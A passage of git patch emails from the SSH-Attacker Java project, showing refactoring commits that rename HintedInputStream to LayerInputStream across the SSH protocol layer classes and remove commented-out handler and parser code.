b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java @@ -22,11 +22,6 @@ public AgentRequestForwardingMessageSSHV1Handler(SshContext context) { super(context); } - /*public HybridKeyExchangeReplyMessageHandler( - SshContext context, HybridKeyExchangeReplyMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(AgentRequestForwardingMessageSSH1 message) { LOGGER.info("Recived a EOF Message"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java index fecb1a3a8..314a52a4f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/AsciiMessageHandler.java @@ -19,35 +19,9 @@ public AsciiMessageHandler(SshContext context) { super(context); } - /*public AsciiMessageHandler(SshContext context, AsciiMessage message) { - super(context, message); - }*/ - @Override public void adjustContext(AsciiMessage message) { LOGGER.debug( "Received text message: {}", backslashEscapeString(message.getText().getValue())); } - - /* - @Override - public AsciiMessageParser getParser(final byte[] array) { - return new AsciiMessageParser(array); - } - - @Override - public AsciiMessageParser getParser(final byte[] array, final int startPosition) { - return new AsciiMessageParser(array, startPosition); - } - - @Override - public ProtocolMessagePreparator getPreparator() { - return new AsciiMessagePreparator(context.getChooser(), message); - } - - @Override - public AsciiMessageSerializer getSerializer() { - return new AsciiMessageSerializer(message); - } - */ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java index 0ce64193e..fc26b2570 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java @@ -18,22 +18,10 @@ public class AsciiMessageParser extends ProtocolMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - /*public AsciiMessageParser(final byte[] array) { - super(array); - } - - public AsciiMessageParser(final byte[] array, final int startPosition) { - super(array, startPosition); - }*/ public AsciiMessageParser(InputStream stream) { super(stream); } - /* @Override - protected AsciiMessage createMessage() { - return new AsciiMessage(); - }*/ - public void parse(AsciiMessage message) { LOGGER.debug("Parsing ApplicationMessage"); parseProtocolMessageContents(message); @@ -41,7 +29,7 @@ public void parse(AsciiMessage message) { private void parseText(AsciiMessage message) { // parse till CR NL (and remove them) - String result = this.parseStringTill(CharConstants.NEWLINE); + String result = parseStringTill(CharConstants.NEWLINE); if (result.endsWith("\r\n")) { message.setEndOfMessageSequence("\r\n"); result = result.substring(0, result.length() - 2); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java index d974831df..f331e097c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParser.java @@ -10,7 +10,6 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.ExtensionInfoMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.extension.*; import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -21,7 +20,6 @@ public class ExtensionInfoMessageParser extends SshMessageParser Date: Fri, 29 Mar 2024 13:40:55 +0100 Subject: [PATCH 163/176] Renamen "hintedInputStream" into "LayerInputStream" to be correct for ssh --- .../sshattacker/core/layer/ProtocolLayer.java | 12 +-- .../core/layer/impl/PacketLayer.java | 5 +- .../core/layer/impl/SSH1Layer.java | 16 ++-- .../core/layer/impl/SSH2Layer.java | 92 +++++++++---------- .../sshattacker/core/layer/impl/TcpLayer.java | 10 +- ...InputStream.java => LayerInputStream.java} | 9 +- ...ava => LayerInputStreamAdapterStream.java} | 4 +- ...Stream.java => LayerLayerInputStream.java} | 4 +- 8 files changed, 76 insertions(+), 76 deletions(-) rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/{HintedInputStream.java => LayerInputStream.java} (87%) rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/{HintedInputStreamAdapterStream.java => LayerInputStreamAdapterStream.java} (88%) rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/{HintedLayerInputStream.java => LayerLayerInputStream.java} (94%) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index 007bcd036..6179fd121 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -15,7 +15,7 @@ import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.layer.data.Preparator; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerInputStream; import java.io.IOException; import java.util.LinkedList; import java.util.List; @@ -41,9 +41,9 @@ public abstract class ProtocolLayer { private List producedDataContainers; - protected HintedInputStream currentInputStream = null; + protected LayerInputStream currentInputStream = null; - protected HintedInputStream nextInputStream = null; + protected LayerInputStream nextInputStream = null; private LayerType layerType; @@ -156,7 +156,7 @@ protected boolean containerAlreadyUsedByHigherLayer(ContainerT container) { * @throws IOException Some layers might produce IOExceptions when sending or receiving data * over sockets etc. */ - public HintedInputStream getDataStream() throws IOException { + public LayerInputStream getDataStream() throws IOException { if (currentInputStream == null) { receiveMoreData(); if (currentInputStream == null) { @@ -244,7 +244,7 @@ public LayerType getLayerType() { * @param context The context of the connection. Keeps parsed and handled values. */ protected void readDataContainer(ContainerT container, LayerContext context) { - HintedInputStream inputStream; + LayerInputStream inputStream; try { inputStream = getLowerLayer().getDataStream(); } catch (IOException e) { @@ -265,7 +265,7 @@ protected void readDataContainer(ContainerT container, LayerContext context) { } protected void readContainerFromStream( - ContainerT container, LayerContext context, HintedInputStream inputStream) { + ContainerT container, LayerContext context, LayerInputStream inputStream) { Parser parser = container.getParser(context, inputStream); try { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 6217daae4..4a44ff74d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -10,7 +10,6 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; -import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.PacketLayerType; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; @@ -21,7 +20,7 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.Preparator; import de.rub.nds.sshattacker.core.layer.data.Serializer; -import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; @@ -188,7 +187,7 @@ public void receiveMoreData() throws IOException { if (currentInputStream == null) { // only set new input stream if necessary, extend current stream otherwise - currentInputStream = new HintedLayerInputStream(this); + currentInputStream = new LayerLayerInputStream(this); } currentInputStream.extendStream(packet.getPayload().getValue()); } catch (TimeoutException ex) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 204cf29e3..9ed0d1a2e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -17,9 +17,9 @@ import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerInputStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerInputStreamAdapterStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; @@ -101,7 +101,7 @@ public LayerProcessingResult sendData(byte[] additionalData) throws IOException public LayerProcessingResult receiveData() { try { - HintedInputStream dataStream; + LayerInputStream dataStream; do { try { dataStream = getLowerLayer().getDataStream(); @@ -289,10 +289,10 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { } private void readDataFromStream(ProtocolMessage message, AbstractPacket packet) { - HintedInputStream temp_stream; + LayerInputStream temp_stream; temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } @@ -300,9 +300,9 @@ private void readDataFromStream(ProtocolMessage message, AbstractPacket pa @Override public void receiveMoreData() throws IOException { try { - HintedInputStream dataStream = null; + LayerInputStream dataStream = null; dataStream = getLowerLayer().getDataStream(); - currentInputStream = new HintedLayerInputStream(this); + currentInputStream = new LayerLayerInputStream(this); currentInputStream.extendStream(dataStream.readAllBytes()); } catch (TimeoutException ex) { LOGGER.debug(ex); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 1bafeee99..013606573 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -15,9 +15,9 @@ import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerInputStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerInputStreamAdapterStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BlobPacket; @@ -96,7 +96,7 @@ public LayerProcessingResult sendData(byte[] additionalData) throws IOException @Override public LayerProcessingResult receiveData() { try { - HintedInputStream dataStream; + LayerInputStream dataStream; do { try { dataStream = getLowerLayer().getDataStream(); @@ -344,10 +344,10 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { private void readUserAuthReq(AbstractPacket packet) { UserAuthUnknownMessage userAuthUnknownMessage = new UserAuthUnknownMessage(); - HintedInputStream inputStream; - HintedInputStream temp_stream; + LayerInputStream inputStream; + LayerInputStream temp_stream; inputStream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); UserAuthUnknownMessageParser parser = new UserAuthUnknownMessageParser(inputStream); parser.parse(userAuthUnknownMessage); @@ -367,7 +367,7 @@ private void readUserAuthReq(AbstractPacket packet) { LOGGER.info("Parsing Authenticationmethod: None"); UserAuthNoneMessage userAuthNoneMessage = new UserAuthNoneMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -379,7 +379,7 @@ private void readUserAuthReq(AbstractPacket packet) { LOGGER.info("Parsing Authenticationmethod: Password"); UserAuthPasswordMessage userAuthPasswordMessage = new UserAuthPasswordMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -392,7 +392,7 @@ private void readUserAuthReq(AbstractPacket packet) { LOGGER.info("Parsing Authenticationmethod: PubKey"); UserAuthPubkeyMessage userAuthPubkeyMessage = new UserAuthPubkeyMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -404,7 +404,7 @@ private void readUserAuthReq(AbstractPacket packet) { LOGGER.info("Parsing Authenticationmethod: Hostbased"); UserAuthHostbasedMessage userAuthHostbasedMessage = new UserAuthHostbasedMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -416,7 +416,7 @@ private void readUserAuthReq(AbstractPacket packet) { UserAuthKeyboardInteractiveMessage userAuthKeyboardInteractiveMessage = new UserAuthKeyboardInteractiveMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( userAuthUnknownMessage .getCompleteResultingMessage() @@ -436,11 +436,11 @@ private void readUserAuthReq(AbstractPacket packet) { private void readChannelRequest(AbstractPacket packet) { ChannelRequestUnknownMessage channelRequestUnknownMessage = new ChannelRequestUnknownMessage(); - HintedInputStream inputStream; - HintedInputStream temp_stream; + LayerInputStream inputStream; + LayerInputStream temp_stream; inputStream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); ChannelRequestUnknownMessageParser parser = @@ -462,7 +462,7 @@ private void readChannelRequest(AbstractPacket packet) { LOGGER.info("Parsing Authenticationmethod: None"); ChannelRequestPtyMessage channelRequestPtyMessage = new ChannelRequestPtyMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -474,7 +474,7 @@ private void readChannelRequest(AbstractPacket packet) { LOGGER.info("Parsing Authenticationmethod: Password"); ChannelRequestX11Message channelRequestX11Message = new ChannelRequestX11Message(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -487,7 +487,7 @@ private void readChannelRequest(AbstractPacket packet) { LOGGER.info("Parsing Authenticationmethod: PubKey"); ChannelRequestEnvMessage channelRequestEnvMessage = new ChannelRequestEnvMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -500,7 +500,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestShellMessage channelRequestShellMessage = new ChannelRequestShellMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -512,7 +512,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestExecMessage channelRequestExecMessage = new ChannelRequestExecMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -524,7 +524,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestSubsystemMessage channelRequestSubsystemMessage = new ChannelRequestSubsystemMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -536,7 +536,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestWindowChangeMessage channelRequestWindowChangeMessage = new ChannelRequestWindowChangeMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -547,7 +547,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestXonXoffMessage channelRequestXonXoffMessage = new ChannelRequestXonXoffMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -558,7 +558,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestSignalMessage channelRequestSignalMessage = new ChannelRequestSignalMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -569,7 +569,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestExitStatusMessage channelRequestExitStatusMessage = new ChannelRequestExitStatusMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -580,7 +580,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestExitSignalMessage channelRequestExitSignalMessage = new ChannelRequestExitSignalMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -591,7 +591,7 @@ private void readChannelRequest(AbstractPacket packet) { ChannelRequestAuthAgentMessage channelRequestAuthAgentMessage = new ChannelRequestAuthAgentMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelRequestUnknownMessage .getCompleteResultingMessage() @@ -609,11 +609,11 @@ private void readChannelRequest(AbstractPacket packet) { private void readGlobalRequest(AbstractPacket packet) { GlobalRequestUnknownMessage globalRequestUnknownMessage = new GlobalRequestUnknownMessage(); - HintedInputStream inputStream; - HintedInputStream temp_stream; + LayerInputStream inputStream; + LayerInputStream temp_stream; inputStream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); GlobalRequestUnknownMessageParser parser = @@ -626,7 +626,7 @@ private void readGlobalRequest(AbstractPacket packet) { GlobalRequestTcpIpForwardMessage tcpIpForwardMessage = new GlobalRequestTcpIpForwardMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -636,7 +636,7 @@ private void readGlobalRequest(AbstractPacket packet) { GlobalRequestCancelTcpIpForwardMessage cancelTcpIpForwardMessage = new GlobalRequestCancelTcpIpForwardMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -646,7 +646,7 @@ private void readGlobalRequest(AbstractPacket packet) { GlobalRequestNoMoreSessionsMessage noMoreSessionsMessage = new GlobalRequestNoMoreSessionsMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -656,7 +656,7 @@ private void readGlobalRequest(AbstractPacket packet) { GlobalRequestOpenSshHostKeysMessage openSshHostKeysMessage = new GlobalRequestOpenSshHostKeysMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( globalRequestUnknownMessage .getCompleteResultingMessage() @@ -670,29 +670,29 @@ private void readGlobalRequest(AbstractPacket packet) { private void readASCIIData(AbstractPacket packet) { AsciiMessage message = new AsciiMessage(); - HintedInputStream temp_stream; + LayerInputStream temp_stream; temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } private void readMessageFromStream(ProtocolMessage message, AbstractPacket packet) { - HintedInputStream temp_stream; + LayerInputStream temp_stream; temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); } private void readChannelOpen(AbstractPacket packet) { ChannelOpenUnknownMessage channelOpenUnknownMessage = new ChannelOpenUnknownMessage(); - HintedInputStream inputStream; - HintedInputStream temp_stream; + LayerInputStream inputStream; + LayerInputStream temp_stream; inputStream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); ChannelOpenUnknownMessageParser parser = new ChannelOpenUnknownMessageParser(inputStream); @@ -704,7 +704,7 @@ private void readChannelOpen(AbstractPacket packet) { ChannelOpenSessionMessage channelOpenSessionMessage = new ChannelOpenSessionMessage(); temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream( channelOpenUnknownMessage .getCompleteResultingMessage() @@ -719,10 +719,10 @@ private void readChannelOpen(AbstractPacket packet) { private void readVersionExchangeProtocolData(AbstractPacket packet) { VersionExchangeMessage message = new VersionExchangeMessage(); - HintedInputStream temp_stream; + LayerInputStream temp_stream; temp_stream = - new HintedInputStreamAdapterStream( + new LayerInputStreamAdapterStream( new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); @@ -743,9 +743,9 @@ private void readUnknownProtocolData() { @Override public void receiveMoreData() throws IOException { try { - HintedInputStream dataStream = null; + LayerInputStream dataStream = null; dataStream = getLowerLayer().getDataStream(); - currentInputStream = new HintedLayerInputStream(this); + currentInputStream = new LayerLayerInputStream(this); currentInputStream.extendStream(dataStream.readAllBytes()); } catch (TimeoutException ex) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 034da8d50..4a31fa125 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -15,8 +15,8 @@ import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.TcpContext; import de.rub.nds.sshattacker.core.layer.data.DataContainer; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; -import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerInputStream; +import de.rub.nds.sshattacker.core.layer.stream.LayerInputStreamAdapterStream; import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; import java.io.ByteArrayInputStream; import java.io.IOException; @@ -65,7 +65,7 @@ public void receiveMoreData() throws IOException { /** Returns the inputStream associated with the TCP socket. */ @Override - public HintedInputStream getDataStream() throws IOException { + public LayerInputStream getDataStream() throws IOException { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); if (context.getContext().getSshContext().isReceiveAsciiModeEnabled()) { @@ -76,12 +76,12 @@ public HintedInputStream getDataStream() throws IOException { receiveBuffer = ArrayConverter.concatenate(receiveBuffer, readByte); } while (readByte.length > 0 && readByte[0] != CharConstants.NEWLINE); currentInputStream = - new HintedInputStreamAdapterStream(new ByteArrayInputStream(receiveBuffer)); + new LayerInputStreamAdapterStream(new ByteArrayInputStream(receiveBuffer)); return currentInputStream; } else { currentInputStream = - new HintedInputStreamAdapterStream(getTransportHandler().getInputStream()); + new LayerInputStreamAdapterStream(getTransportHandler().getInputStream()); return currentInputStream; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStream.java similarity index 87% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStream.java index 57641a187..522eb55e0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStream.java @@ -14,12 +14,13 @@ import java.io.InputStream; /** - * InputStream that contains a LayerProcessingHint. Also provides methods useful when parsing data - * from byteArrays. + * Inputstream used in layers, Implements additionally the read chunkg and extend feature */ -public abstract class HintedInputStream extends InputStream { +public abstract class LayerInputStream extends InputStream { - public HintedInputStream() {} + protected LayerInputStream() { + super(); + } public byte readByte() throws IOException { return (byte) read(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStreamAdapterStream.java similarity index 88% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStreamAdapterStream.java index be06f0637..16e3312fc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedInputStreamAdapterStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerInputStreamAdapterStream.java @@ -14,11 +14,11 @@ * HintedInputStream, that wraps around another Stream (used in the {@link * de.rub.nds.sshattacker.core.layer.impl.TcpLayer} */ -public class HintedInputStreamAdapterStream extends HintedInputStream { +public class LayerInputStreamAdapterStream extends LayerInputStream { private InputStream stream; - public HintedInputStreamAdapterStream(InputStream stream) { + public LayerInputStreamAdapterStream(InputStream stream) { super(); this.stream = stream; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerLayerInputStream.java similarity index 94% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerLayerInputStream.java index f6bd5cd39..75003d3e8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/HintedLayerInputStream.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/stream/LayerLayerInputStream.java @@ -17,13 +17,13 @@ * The HintedLayerInputStream is assigned to a layer. When reading data from it, the stream tries to * receive more data using the layer it is assigned to. */ -public class HintedLayerInputStream extends HintedInputStream { +public class LayerLayerInputStream extends LayerInputStream { private final ProtocolLayer layer; private ByteArrayInputStream stream = new ByteArrayInputStream(new byte[0]); - public HintedLayerInputStream(ProtocolLayer layer) { + public LayerLayerInputStream(ProtocolLayer layer) { super(); this.layer = layer; } From dc69156b60f011cb7cc6929ce3a49868c4ae294a Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 29 Mar 2024 13:42:08 +0100 Subject: [PATCH 164/176] More Cleanup --- .../sshattacker/core/layer/ProtocolLayer.java | 14 ++++++------ .../core/layer/impl/PacketLayer.java | 22 ++++++------------- .../core/layer/stream/LayerInputStream.java | 4 +--- .../core/packet/BinaryPacketSSHv1.java | 13 +++++------ 4 files changed, 20 insertions(+), 33 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index 6179fd121..ebf1bcaad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -33,17 +33,17 @@ public abstract class ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); - private ProtocolLayer higherLayer = null; + private ProtocolLayer higherLayer; - private ProtocolLayer lowerLayer = null; + private ProtocolLayer lowerLayer; private LayerConfiguration layerConfiguration; private List producedDataContainers; - protected LayerInputStream currentInputStream = null; + protected LayerInputStream currentInputStream; - protected LayerInputStream nextInputStream = null; + protected LayerInputStream nextInputStream; private LayerType layerType; @@ -260,7 +260,7 @@ protected void readDataContainer(ContainerT container, LayerContext context) { handler.adjustContext(container); addProducedContainer(container); } catch (RuntimeException ex) { - setUnreadBytes(parser.getAlreadyParsed()); + unreadBytes = parser.getAlreadyParsed(); } } @@ -274,7 +274,7 @@ protected void readContainerFromStream( handler.adjustContext(container); addProducedContainer(container); } catch (RuntimeException ex) { - setUnreadBytes(parser.getAlreadyParsed()); + unreadBytes = parser.getAlreadyParsed(); } } @@ -294,7 +294,7 @@ public boolean 